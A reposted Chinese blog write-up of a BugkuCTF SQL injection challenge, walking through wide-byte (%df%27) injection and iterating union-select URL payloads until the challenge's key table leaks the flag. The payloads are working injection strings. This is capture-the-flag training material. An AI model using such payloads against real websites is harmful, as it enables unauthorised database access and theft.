码迷,mamicode.com
首页 > 数据库 > 详细

BugkuCTF sql注入

时间:2018-05-04 21:56:21      阅读:256      评论:0      收藏:0      [点我收藏+]

标签:code   .com   构造   sele   web   影响   字节   宽字节   查询   

前言

写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~

技术分享图片

点开链接一看

技术分享图片

很明显可以看出查询key表,id=1的string字段

我们去构造payload:

http://103.238.227.13:10083/index.php?id=-1%20union%20select%201,string%20from%20%27key%27%20#

技术分享图片

我们发现没有出来 ,诶,怎么什么都没有了 ,继续重头开始 ,看一下是什么注入

技术分享图片

发现id=1和id=1’都没错,这时候我们想起了宽字节注入 ,试一下

技术分享图片

果然是这个样子,有关宽字段的讲解可以参考这里

那么就好了构造payload:

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from ‘key‘#

技术分享图片

报错,我们可以知道是引号的问题 ,那试一下另一种引号

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`#

这种引号在tab键的上面

技术分享图片

发现还报错 ,才想起来了可能是#的问题  把#改成%23试试看

http://103.238.227.13:10083/index.php?id=1%df%27 union select 1,string from `key`%23

技术分享图片

直接爆出了key,这应该是我们需要的flag

 

BugkuCTF sql注入

标签:code   .com   构造   sele   web   影响   字节   宽字节   查询   

原文地址:https://www.cnblogs.com/ECJTUACM-873284962/p/8992618.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!